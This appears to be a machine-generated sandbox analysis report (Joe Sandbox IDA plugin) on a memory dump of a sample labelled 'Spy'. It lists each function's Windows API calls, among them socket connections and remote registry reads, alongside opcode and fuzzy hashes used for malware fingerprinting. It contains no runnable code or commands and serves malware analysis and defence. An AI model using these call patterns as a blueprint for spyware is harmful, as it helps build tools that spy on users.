                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: dfe34934b12ddbeddd4d2db036a8e41350adffac2c495240d16c706c008dcefd
                                                      • Instruction ID: 8e70a18063dcd7df48972f304eba26b2f8c1be48744780668bbe2e29d070e0c7
                                                      • Opcode Fuzzy Hash: dfe34934b12ddbeddd4d2db036a8e41350adffac2c495240d16c706c008dcefd
                                                      • Instruction Fuzzy Hash: 96212176614219AF9F10EFA8DC88DBA77BCEB09360B448126FA15DF350DA70ED858760
                                                      APIs
                                                        • Part of subcall function 00AF8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00AF84A0
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00AF68B1
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AF68C0
                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00AF68F9
                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00AF6902
                                                      • WSAGetLastError.WSOCK32 ref: 00AF690C
                                                      • closesocket.WSOCK32(00000000), ref: 00AF6935
                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00AF694E
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 910771015-0
                                                      • Opcode ID: c1409b712568f8ec45f1c2adb030abdd5ed820b74c5ef14d381871395713ab15
                                                      • Instruction ID: 037d6459cf27c0fa40a6c3b52d669521cb046bd79eddfd46f1d699548ed44fcb
                                                      • Opcode Fuzzy Hash: c1409b712568f8ec45f1c2adb030abdd5ed820b74c5ef14d381871395713ab15
                                                      • Instruction Fuzzy Hash: 0031A471600118AFDB10AFA4CC85BBE77B9EB44765F048029FE05AB291DBB4AC458BA1
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ADE3A5
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ADE3CB
                                                      • SysAllocString.OLEAUT32(00000000), ref: 00ADE3CE
                                                      • SysAllocString.OLEAUT32 ref: 00ADE3EF
                                                      • SysFreeString.OLEAUT32 ref: 00ADE3F8
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00ADE412
                                                      • SysAllocString.OLEAUT32(?), ref: 00ADE420
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: eb4f22cc112af26d499a10982480fe152190000058a0a9d7080c930168f2cc80
                                                      • Instruction ID: 45967c014259f426cf56926702c843274e09f68cf6a83e8dc3a4538df22a4488
                                                      • Opcode Fuzzy Hash: eb4f22cc112af26d499a10982480fe152190000058a0a9d7080c930168f2cc80
                                                      • Instruction Fuzzy Hash: 06214775604104AFEB50FFA8DC89DAE77ECEB09360B408526F915CF3A0DA75EC818764
                                                      APIs
                                                        • Part of subcall function 00A82111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A8214F
                                                        • Part of subcall function 00A82111: GetStockObject.GDI32(00000011), ref: 00A82163
                                                        • Part of subcall function 00A82111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A8216D
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B07C57
                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B07C64
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B07C6F
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B07C7E
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B07C8A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 1025951953-3636473452
                                                      • Opcode ID: 91dd7314a185114b57b8e0d53b28dc9548a87ed4d37e763d47befa2e6490341f
                                                      • Instruction ID: 61e5ced6a60e8176f22935a1ef49664890ec8008a765679d7bc40547c4cf08c6
                                                      • Opcode Fuzzy Hash: 91dd7314a185114b57b8e0d53b28dc9548a87ed4d37e763d47befa2e6490341f
                                                      • Instruction Fuzzy Hash: B91186B1554219BEFF159F60CC85EE7BF5DEF08758F114115BA04A6090CB71AC21DBA4
                                                      APIs
                                                      • __init_pointers.LIBCMT ref: 00AA9D16
                                                        • Part of subcall function 00AA33B7: EncodePointer.KERNEL32(00000000), ref: 00AA33BA
                                                        • Part of subcall function 00AA33B7: __initp_misc_winsig.LIBCMT ref: 00AA33D5
                                                        • Part of subcall function 00AA33B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00AAA0D0
                                                        • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00AAA0E4
                                                        • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00AAA0F7
                                                        • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00AAA10A
                                                        • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00AAA11D
                                                        • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00AAA130
                                                        • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00AAA143
                                                        • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00AAA156
                                                        • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00AAA169
                                                        • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00AAA17C
                                                        • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00AAA18F
                                                        • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00AAA1A2
                                                        • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00AAA1B5
                                                        • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00AAA1C8
                                                        • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00AAA1DB
                                                        • Part of subcall function 00AA33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00AAA1EE
                                                      • __mtinitlocks.LIBCMT ref: 00AA9D1B
                                                      • __mtterm.LIBCMT ref: 00AA9D24
                                                        • Part of subcall function 00AA9D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00AA9D29,00AA7EFD,00B3CD38,00000014), ref: 00AA9E86
                                                        • Part of subcall function 00AA9D8C: _free.LIBCMT ref: 00AA9E8D
                                                        • Part of subcall function 00AA9D8C: DeleteCriticalSection.KERNEL32(00B40C00,?,?,00AA9D29,00AA7EFD,00B3CD38,00000014), ref: 00AA9EAF
                                                      • __calloc_crt.LIBCMT ref: 00AA9D49
                                                      • __initptd.LIBCMT ref: 00AA9D6B
                                                      • GetCurrentThreadId.KERNEL32 ref: 00AA9D72
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                      • String ID:
                                                      • API String ID: 3567560977-0
                                                      • Opcode ID: 003e7ae8380d0f92ffa8a5a42378b9ec7a4817554eb24d77cdc94fabcf560873
                                                      • Instruction ID: e00c91f275d083daaa346851525c26a5e7bf3e10a00e2538969eca24e8af6fef
                                                      • Opcode Fuzzy Hash: 003e7ae8380d0f92ffa8a5a42378b9ec7a4817554eb24d77cdc94fabcf560873
                                                      • Instruction Fuzzy Hash: 75F090325197116EEB747B787D0369B76D4EF43770F20861AF550D70D3EF2089814191
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00AA4282,?), ref: 00AA41D3
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00AA41DA
                                                      • EncodePointer.KERNEL32(00000000), ref: 00AA41E6
                                                      • DecodePointer.KERNEL32(00000001,00AA4282,?), ref: 00AA4203
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                      • String ID: RoInitialize$combase.dll
                                                      • API String ID: 3489934621-340411864
                                                      • Opcode ID: 652f0e9e0c91ab252b9b7e4eb6b6ff16ade4c3aa32b1377f13e9bcf2c4487b77
                                                      • Instruction ID: 72fd1a0465d303c781fa555d311e7d400cf06c574c0276c7d09ed78a67c5d21b
                                                      • Opcode Fuzzy Hash: 652f0e9e0c91ab252b9b7e4eb6b6ff16ade4c3aa32b1377f13e9bcf2c4487b77
                                                      • Instruction Fuzzy Hash: 73E012B4560B41AFDB202B70EC4DB943595B756B06F908524B411E70F0DFF552C88F04
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AA41A8), ref: 00AA42A8
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00AA42AF
                                                      • EncodePointer.KERNEL32(00000000), ref: 00AA42BA
                                                      • DecodePointer.KERNEL32(00AA41A8), ref: 00AA42D5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                      • String ID: RoUninitialize$combase.dll
                                                      • API String ID: 3489934621-2819208100
                                                      • Opcode ID: b212274c9bfd3351d1fc5c2b3bdf9d18514633ac54085cc5c222b1bfa1228751
                                                      • Instruction ID: b845de99f921bb5eeee77b6b3462ef7386c22043c87de5c5fecc48b832087863
                                                      • Opcode Fuzzy Hash: b212274c9bfd3351d1fc5c2b3bdf9d18514633ac54085cc5c222b1bfa1228751
                                                      • Instruction Fuzzy Hash: 28E0B674560B00BBDB21AB60BD0DBC43AA4BB5AB06F908129F001E74F1DFF447C4CA14
                                                      APIs
                                                      • GetClientRect.USER32(?,?), ref: 00A821B8
                                                      • GetWindowRect.USER32(?,?), ref: 00A821F9
                                                      • ScreenToClient.USER32(?,?), ref: 00A82221
                                                      • GetClientRect.USER32(?,?), ref: 00A82350
                                                      • GetWindowRect.USER32(?,?), ref: 00A82369
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Rect$Client$Window$Screen
                                                      • String ID:
                                                      • API String ID: 1296646539-0
                                                      • Opcode ID: 2915c6700bad084a1a913d934b988d5fc9fe1072f530376f174007e40f44bfb3
                                                      • Instruction ID: 387ab62f6d015092b871b3e4e9fb259a027d70e09e0f35d95bac18050302a8cc
                                                      • Opcode Fuzzy Hash: 2915c6700bad084a1a913d934b988d5fc9fe1072f530376f174007e40f44bfb3
                                                      • Instruction Fuzzy Hash: 17B18A3991024ADBDF10DFA8C9807FEB7B1FF08310F148129ED59AB255EB70AA50CB64
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _memmove$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 3253778849-0
                                                      • Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                      • Instruction ID: fe5ef885939191d549e2184630452d437aa04394730a4170be6c62479aeca92e
                                                      • Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                      • Instruction Fuzzy Hash: F561DE3050069AABCF11FF61CE82EFE37A8AF59388F044959F9596B292DB309D45CB50
                                                      APIs
                                                        • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                        • Part of subcall function 00B0147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B0091D
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B0095D
                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B00980
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B009A9
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B009EC
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00B009F9
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                      • String ID:
                                                      • API String ID: 4046560759-0
                                                      • Opcode ID: f7365c575c16af5f5fbc9c16ce69712d2c9ed393acebb60cde7b37f8f18367a0
                                                      • Instruction ID: d41cdd7df34c62ad69f7e4a772a5269117f1e592709555cc55fe739ef412e2c4
                                                      • Opcode Fuzzy Hash: f7365c575c16af5f5fbc9c16ce69712d2c9ed393acebb60cde7b37f8f18367a0
                                                      • Instruction Fuzzy Hash: 36517831218205AFD714EF68C985E6EBBE9FF89314F04495DF485872A2EB31E905CB52
                                                      APIs
                                                      • GetMenu.USER32(?), ref: 00B05E38
                                                      • GetMenuItemCount.USER32(00000000), ref: 00B05E6F
                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B05E97
                                                      • GetMenuItemID.USER32(?,?), ref: 00B05F06
                                                      • GetSubMenu.USER32(?,?), ref: 00B05F14
                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00B05F65
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountMessagePostString
                                                      • String ID:
                                                      • API String ID: 650687236-0
                                                      • Opcode ID: 69c2ad6bd55c98fef6e81ef56c77e604976c5885cbc7bd86778bacb8d1020904
                                                      • Instruction ID: 149042c4f544b643ec68af490853258ae1d1179449eda268dd692bd2865f55c6
                                                      • Opcode Fuzzy Hash: 69c2ad6bd55c98fef6e81ef56c77e604976c5885cbc7bd86778bacb8d1020904
                                                      • Instruction Fuzzy Hash: EF517035A0161AAFCF21EF64C945AAEBBF5EF48310F104099F905BB391DB74AE418F90
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00ADF6A2
                                                      • VariantClear.OLEAUT32(00000013), ref: 00ADF714
                                                      • VariantClear.OLEAUT32(00000000), ref: 00ADF76F
                                                      • _memmove.LIBCMT ref: 00ADF799
                                                      • VariantClear.OLEAUT32(?), ref: 00ADF7E6
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00ADF814
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                      • String ID:
                                                      • API String ID: 1101466143-0
                                                      • Opcode ID: 129f4210dedb0ca806a7fcc490faf24d748c02d0359cde2ac29662eb358ca25c
                                                      • Instruction ID: 62dade1475f904526b12f61dd2ea632cf207fde04bed9a58d28ebc3240006fd7
                                                      • Opcode Fuzzy Hash: 129f4210dedb0ca806a7fcc490faf24d748c02d0359cde2ac29662eb358ca25c
                                                      • Instruction Fuzzy Hash: B8513E75A00209EFDB14CF58C884AAAB7B8FF4D354B15856AED5ADB304D730E951CF90
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AE29FF
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AE2A4A
                                                      • IsMenu.USER32(00000000), ref: 00AE2A6A
                                                      • CreatePopupMenu.USER32 ref: 00AE2A9E
                                                      • GetMenuItemCount.USER32(000000FF), ref: 00AE2AFC
                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00AE2B2D
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                      • String ID:
                                                      • API String ID: 3311875123-0
                                                      • Opcode ID: c5b310a49d2e9296afe2638984f6be74a36062b9371c30efaf4c234072052c97
                                                      • Instruction ID: 5cde94af807bad33392248ba1291aae65e37adbbeba1964e455525bf1204b023
                                                      • Opcode Fuzzy Hash: c5b310a49d2e9296afe2638984f6be74a36062b9371c30efaf4c234072052c97
                                                      • Instruction Fuzzy Hash: 7E51F070600389DFDF21CF6AC888BAEBBF9EF54314F144129E8119B2A1E7B09D44CB51
                                                      APIs
                                                        • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 00A81B76
                                                      • GetWindowRect.USER32(?,?), ref: 00A81BDA
                                                      • ScreenToClient.USER32(?,?), ref: 00A81BF7
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A81C08
                                                      • EndPaint.USER32(?,?), ref: 00A81C52
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                      • String ID:
                                                      • API String ID: 1827037458-0
                                                      • Opcode ID: 38fd5b48c16c20b8a3eaf6ef89721fda7748cd088f82df5e227da9408aea7a2b
                                                      • Instruction ID: 7866d329842e46055627cab028832c592b529016d56057ae1074af2087bf9226
                                                      • Opcode Fuzzy Hash: 38fd5b48c16c20b8a3eaf6ef89721fda7748cd088f82df5e227da9408aea7a2b
                                                      • Instruction Fuzzy Hash: D3419E74144204AFD710EF25CC88FBA7BFCFB56360F140669F995872A2CB709946DB61
                                                      APIs
                                                      • ShowWindow.USER32(00B477B0,00000000,013954F8,?,?,00B477B0,?,00B0BC1A,?,?), ref: 00B0BD84
                                                      • EnableWindow.USER32(?,00000000), ref: 00B0BDA8
                                                      • ShowWindow.USER32(00B477B0,00000000,013954F8,?,?,00B477B0,?,00B0BC1A,?,?), ref: 00B0BE08
                                                      • ShowWindow.USER32(?,00000004,?,00B0BC1A,?,?), ref: 00B0BE1A
                                                      • EnableWindow.USER32(?,00000001), ref: 00B0BE3E
                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00B0BE61
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
                                                      • API String ID: 642888154-0
